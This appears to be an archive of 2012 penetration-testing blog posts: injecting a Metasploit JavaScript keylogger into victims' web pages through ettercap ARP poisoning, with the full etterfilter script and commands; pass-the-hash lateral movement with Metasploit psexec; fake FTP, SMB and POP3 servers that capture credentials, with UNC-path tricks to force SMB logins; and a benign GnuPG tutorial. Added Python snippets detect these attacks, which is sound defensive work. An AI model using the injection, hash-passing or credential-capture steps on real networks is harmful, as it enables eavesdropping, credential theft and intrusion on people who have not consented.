Saturday, August 18, 2012

Injecting keylogger

The used tools:
metasploit auxiliary module (http_javascript_keylogger)
ettercap

DEMO:

1- Run the "http_javascript_keylogger" module

msf > use auxiliary/server/capture/http_javascript_keylogger

This auxiliary module creates JavaScript which can be injected into a web page to record the keys pressed by the user inside that page only, including the user's login credentials.

After running this module, it gives you a link. To use it, append "/anyname.js"; you can name the file anything you want.
I set URIPATH to "keylogger" ==> This is the link:

http://192.168.45.191:8080/keylogger/anyname.js
http://ip:SRVPORT/URIPATH/anyname.js

By now you have your JavaScript link. How do you inject it?

You could inject it via XSS or network spoofing.

I'll use ettercap to manipulate (with an etterfilter script) the web pages on the network and inject my JavaScript.

2- The filter script used for injection:


# Client -> server: strip Accept-Encoding so the page comes back uncompressed and can be edited.
# The replacement is the same length as the original string, so the packet size does not change.
if (ip.proto == TCP && ip.dst != '192.168.56.101' && (tcp.dst == 80 || tcp.dst == 8080)) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Nothing!");
   }
}

# Server -> client: insert the script tag right after <head> (lower-case and upper-case variants).
if (ip.proto == TCP && ip.dst != '192.168.56.101' && (tcp.src == 80 || tcp.src == 8080)) {
   if (search(DATA.data, "<head>")) {
      replace("<head>", "<head><script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>");
      msg("Keylogger injected :) \n");
   }
   if (search(DATA.data, "<HEAD>")) {
      replace("<HEAD>", "<HEAD><SCRIPT SRC='http://192.168.45.191:8080/keylogger/anything.js'> </SCRIPT>");
      msg("Keylogger injected :) \n");
   }
}

This filter appends "<script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>" right after "<head>", so the script is loaded immediately when the page is parsed.

3- Save it as a text file, then compile it with etterfilter into a binary filter. This is a MUST, because ettercap won't load an ASCII filter.
Use this command:
etterfilter etterkeylogger -o etterkeylogger.ef

where "etterkeylogger" is the file that contains the filter script and "etterkeylogger.ef" is the output binary filter used by ettercap.

4- The ettercap command used:

root@bt:~# ettercap -T -M arp -F etterkeylogger.ef /192.168.1.1/ /192.168.1.104/
where,
-T => console (text) mode
-M arp => ARP poisoning attack to redirect the traffic through your machine (don't worry, ettercap then forwards the requests to the Web, so the victim won't notice any change)

-F etterkeylogger.ef => the compiled binary filter produced by etterfilter
/192.168.1.1/ => target 1 (default gateway)
/192.168.1.104/ => target 2 (victim)
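From the defender's side, the filter above leaves two fingerprints in plaintext HTTP traffic: a request whose Accept-Encoding header now reads "Accept-Nothing!", and a response whose <head> is followed immediately by a <script> loaded from a host other than the one that served the page. The Python below is an added example, not code from the original post, that checks a captured request/response pair for both; the two sample messages are constructed, and the script host is the 192.168.45.191 from the filter above.

```python
import re
from urllib.parse import urlparse

# Header name the filter above leaves in place of Accept-Encoding (same length, so the
# packet size is unchanged); a real client never sends it.
MANGLED_HEADER_RE = re.compile(r"^Accept-Nothing!\s*:", re.IGNORECASE | re.MULTILINE)
# <head> (any case) followed only by whitespace and a <script ... src=...> tag.
HEAD_INJECT_RE = re.compile(
    r"<head(?:\s[^>]*)?>\s*<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.IGNORECASE)

def split_http(message: str):
    """Split a raw HTTP message into (header block, body); sample messages use CRLF."""
    head, _, body = message.partition("\r\n\r\n")
    return head, body

def request_host(request: str) -> str:
    """Return the Host header of a raw HTTP request (without port), or '' if absent."""
    m = re.search(r"^Host:\s*([^\r\n]+)", split_http(request)[0], re.IGNORECASE | re.MULTILINE)
    return m.group(1).strip().split(":")[0].lower() if m else ""

def check_pair(request: str, response: str) -> list:
    """Return the injection indicators found in one request/response pair (empty = clean)."""
    findings = []
    if MANGLED_HEADER_RE.search(split_http(request)[0]):
        findings.append("request: Accept-Encoding rewritten to 'Accept-Nothing!' in transit")
    m = HEAD_INJECT_RE.search(split_http(response)[1])
    if m:
        src_host = (urlparse(m.group(1)).hostname or "").lower()
        # A same-origin script right after <head> is normal; a third-party one is the injection.
        if src_host and src_host != request_host(request):
            findings.append(f"response: script from {src_host} inserted right after <head>")
    return findings

# Constructed sample traffic: the request after the filter mangled it, and the reply after injection.
SAMPLE_REQUEST = ("GET /login HTTP/1.1\r\nHost: intranet.example.local\r\n"
                  "Accept-Nothing!: gzip, deflate\r\n\r\n")
SAMPLE_RESPONSE = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                   "<html><head><script src='http://192.168.45.191:8080/keylogger/anything.js'> </script>"
                   "<title>Login</title></head><body><form>...</form></body></html>")

if __name__ == "__main__":
    for finding in check_pair(SAMPLE_REQUEST, SAMPLE_RESPONSE):
        print(finding)
```

The check only works while the traffic is plain HTTP, which is also the only condition under which the injection works at all.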

The RESULT

Secure Communication for Dummies

Monday, August 6, 2012

GnuPG [Encryption/Decryption messages]

GnuPG is a tool for secure communication.

GnuPG uses public-key cryptography so that users may communicate securely. In a public-key system, each user has a pair of keys consisting of a private key and a public key. A user's private key is kept secret; it need never be revealed. The public key may be given to anyone with whom the user wants to communicate. GnuPG uses a somewhat more sophisticated scheme in which a user has a primary keypair and then zero or more additional subordinate keypairs. The primary and subordinate keypairs are bundled to facilitate key management and the bundle can often be considered simply as one keypair.




N.B.:
  • It's a PUBLIC/PRIVATE key ENCRYPTION/DECRYPTION communication.
  • You generate the public and private keys with one command.
  • You give the public key to others so that they can communicate with you, and you keep your OWN private one.
  • Encryption with public keys, decryption with private keys.
  • So, for example, if a SENDER on the other side wants to send you a message or email, he simply uses your public key (that you already EXPORTED to him). You decrypt it with your private key ;)
  • The passphrase (password) is used only by the receiver (the key's generator) to decrypt messages with the private key.
  • The key is exported in a binary format, but this can be inconvenient when the key is to be sent through email or published on a web page. GnuPG therefore supports a command-line option --armor that causes output to be generated in an ASCII-armored format similar to uuencoded documents. In general, any output from GnuPG, e.g., keys, encrypted documents, and signatures, can be ASCII-armored by adding the --armor option.

DEMOs
The environment:
Backtrack machine, used to generate the key pair >> GnuPG
Windows machine >> GPA (GNU Privacy Assistant)

[Case one] backtrack is the RECEIVER, Windows is the SENDER

On backtrack:

Generating the key:

root@bt:~/gpg# gpg --gen-key

root@bt:~/gpg# gpg --list-secret-keys

Exporting the public key:

root@bt:~/gpg# gpg --output eaglepublickey.gpg --export            # exports it in the non-readable binary format

root@bt:~/gpg# gpg --output eaglepublickey.txt --export --armor    # exports it in the readable ASCII-armored format


This is the key that you give to others so they can message you.

On Windows:

Copy the key from backtrack to Windows.
Run the "gpg4win" program (right).
Import the key.
Select the files to encrypt: Windows tab >> File Manager (left)



To decrypt the message:

You have only one private key, so you don't need to specify it, unlike encryption, where you must specify which public key to use (you may have many public keys).

[Case two]

On Windows (GPA):

Keys tab >> new key >> [name: eaglewindows]
Keys tab >> export key >>

On backtrack:

Copy the key to backtrack, then:
root@bt:~/gpg# gpg --import /root/Desktop/key
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows                    # no input file: the message is read from stdin
root@bt:~/gpg# gpg --output encryptedmessage.gpg --encrypt --recipient eaglewindows messagetowindows   # encrypts the file "messagetowindows"

On Windows:

Windows tab >> File Manager
Decrypt
Enter your passphrase

Friday, August 3, 2012

exploit/windows/smb/psexec

Microsoft Windows Authenticated User Code Execution

"This module uses a valid administrator username and password (or password hash) to execute an arbitrary payload. This module is similar to the "psexec" utility provided by SysInternals. This module is now able to clean up after itself. The service created by this tool uses a randomly chosen name and description."

So all you need is the credentials of an administrator account.

PsExec is a light-weight telnet replacement that lets you execute processes on remote systems.
e.g.:  psexec \\ZEAGLE -u test -p test ipconfig

which executes the "ipconfig" command on the remote computer "ZEAGLE" with the ADMINISTRATOR (it must be an administrator) account "test" and password "test".

One great feature of psexec in metasploit is that it allows you to enter the password itself, or you can simply specify the hash values; there is no need to crack them to gain access to the system. Let's think deeply about how we can utilize this attack to further penetrate a network. Let's first say we compromise a system that has an administrator password on the system; we don't need to crack it because psexec allows us to utilize just the hash values, and that administrator account is the same on every system within the domain infrastructure. We can now go from system to system without ever having to worry about cracking the password. One important thing to note is that if only NTLM is available (for example, it's a 15+ character password, or through GPO they specify NTLM response only), simply replace the ****NOPASSWORD**** with 32 0's, for example:
******NOPASSWORD*******:8846f7eaee8fb117ad06bdd830b7586c
Would be replaced by:
00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
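Both Sysinternals PsExec and this module install a Windows service whose binary they copy to the target over the ADMIN$ share, and the module picks a random service name (as the description above says). On the target that shows up as a System log event 7045 (a service was installed). The Python below is an added example, not code from the original post or from Metasploit, that scores such events with three heuristics; the event lines, their key=value rendering and the random-name threshold are constructed assumptions for the example.

```python
import re

# Traces of a PsExec-style service install: binary on an administrative share, the
# well-known Sysinternals service name, or a service name that looks machine-generated.
ADMIN_SHARE_RE = re.compile(r"^\\\\[^\\]+\\(admin\$|c\$)\\", re.IGNORECASE)
WINDOWS_ROOT_RE = re.compile(r"^(%systemroot%|c:\\windows)\\[^\\]+\.exe$", re.IGNORECASE)
KNOWN_REMOTE_EXEC_SERVICES = {"psexesvc"}

def case_switches(name: str) -> int:
    """Count upper/lower transitions between adjacent letters; random alpha names have many."""
    letters = [c for c in name if c.isalpha()]
    return sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())

def parse_7045(line: str) -> dict:
    """Parse the constructed 'EventID|key=value|key=value' rendering of a System log event."""
    event_id, _, rest = line.strip().partition("|")
    fields = dict(part.split("=", 1) for part in rest.split("|"))
    fields["EventID"] = int(event_id)
    return fields

def assess(event: dict) -> list:
    """Return why an installed-service event looks like remote execution (empty = nothing found)."""
    reasons = []
    name, path = event.get("ServiceName", ""), event.get("ImagePath", "").strip('"')
    if name.lower() in KNOWN_REMOTE_EXEC_SERVICES:
        reasons.append("Sysinternals PsExec service name")
    if ADMIN_SHARE_RE.search(path):
        reasons.append("binary launched from an administrative share")
    if name.isalpha() and case_switches(name) >= 4:  # heuristic threshold, tune per estate
        reasons.append("service name looks randomly generated")
    # Many legitimate services live in the Windows directory, so count this only as supporting evidence.
    if reasons and WINDOWS_ROOT_RE.search(path):
        reasons.append("binary dropped directly into the Windows directory")
    return reasons

def suspicious_installs(lines) -> list:
    """Reduce 7045 lines to (service name, reasons) for the suspicious ones."""
    results = []
    for event in map(parse_7045, lines):
        reasons = assess(event) if event["EventID"] == 7045 else []
        if reasons:
            results.append((event["ServiceName"], reasons))
    return results

# Constructed sample events (not real logs): Metasploit-psexec-style, Sysinternals PsExec, and a benign one.
SAMPLE_7045 = [
    r"7045|ServiceName=pMqTeXvLcOhN|ImagePath=\\127.0.0.1\ADMIN$\pMqTeXvLcOhN.exe|StartType=demand start|Account=LocalSystem",
    r"7045|ServiceName=PSEXESVC|ImagePath=%SystemRoot%\PSEXESVC.exe|StartType=demand start|Account=LocalSystem",
    r'7045|ServiceName=VendorAgent|ImagePath="C:\Program Files\Vendor\agent.exe"|StartType=auto start|Account=LocalSystem',
]
```

Call suspicious_installs(SAMPLE_7045) to see the two flagged installs and their reasons; the benign vendor agent is not reported.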




Wednesday, August 1, 2012

auxiliary/server/capture/XXXX part-1

auxiliary/server/capture/ftp

This module provides a fake FTP service that is designed to capture authentication credentials.
I've used FileZilla for the logins.

[used FileZilla to pentest login]

auxiliary/server/capture/smb

This module provides a FAKE SMB service that can be used to capture the challenge-response password hashes of SMB client systems.

Responses sent by this service use, by default, the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), which allows easy cracking with Cain & Abel, L0phtCrack or John the Ripper (with the jumbo patch).

To exploit this, the target system must try to authenticate to this module. The easiest way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.

SMB: Server Message Block (SMB), also known as Common Internet File System (CIFS), is used for providing shared access to files, printers, serial ports, and miscellaneous communications between nodes on a network.

http://en.wikipedia.org/wiki/Server_Message_Block

http://oss.sgi.com/LDP/HOWTO/SMB-HOWTO-8.html

To test accessing the fake server and enter the password:
smbclient -L [serverip] -U [username]
smbclient -L 192.168.45.1 -U test

To crack the captured password hash:
john JOHNPWFILE
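The forced-authentication trick described above works because the client dereferences a UNC path or file:// URL embedded in the content it renders. The Python below is an added example, not part of the original post, of the check a mail gateway or web proxy can run on HTML before delivery: it collects references the client may dereference, extracts the SMB host each would contact, and reports hosts outside an allow-list; the sample email and the allow-list are constructed for the example.

```python
import re
from html.parser import HTMLParser

# A UNC path (\\host\share\...) or a file:// URL in rendered content makes a Windows
# client open an SMB session to 'host' and offer its credentials.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")
FILE_URL_RE = re.compile(r"file:(?://|\\\\)([A-Za-z0-9._-]+)", re.IGNORECASE)

class RefCollector(HTMLParser):
    """Collect attribute values a client dereferences: src-like ones automatically, href on click."""
    FETCHED_ATTRS = {"src", "href", "background", "data", "poster"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in self.FETCHED_ATTRS and value:
                self.refs.append((tag, name.lower(), value))

def smb_host(value: str):
    """Return the host a reference would force an SMB connection to, or None."""
    value = value.strip()
    m = UNC_RE.match(value) or FILE_URL_RE.match(value)
    return m.group(1).lower() if m else None

def forced_auth_findings(html: str, allowed_hosts) -> list:
    """List (tag, attribute, host) for each SMB-triggering reference to a host not on the allow-list."""
    collector = RefCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    findings = []
    for tag, attr, value in collector.refs:
        host = smb_host(value)
        if host and host not in allowed:
            findings.append((tag, attr, host))
    return findings

# Constructed sample: an HTML email with a 1x1 image pointing at an outside share, plus a
# legitimate link to the internal file server (the 192.168.45.1 address is the one used above).
SAMPLE_HTML = """<html><body>
<p>Quarterly report attached.</p>
<img src="https://cdn.example.com/logo.png">
<img src="\\\\192.168.45.1\\share\\report.jpg" width="1" height="1">
<a href="file://fileserver.example.local/docs/q3.docx">Q3 report</a>
</body></html>"""
ALLOWED_SHARE_HOSTS = {"fileserver.example.local"}
```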

auxiliary/server/capture/pop3

This module provides a fake POP3 service that is designed to capture authentication credentials.

[used Microsoft Outlook for pentest login]

auxiliary/server/capture/telnet

auxiliary/server/capture/smtp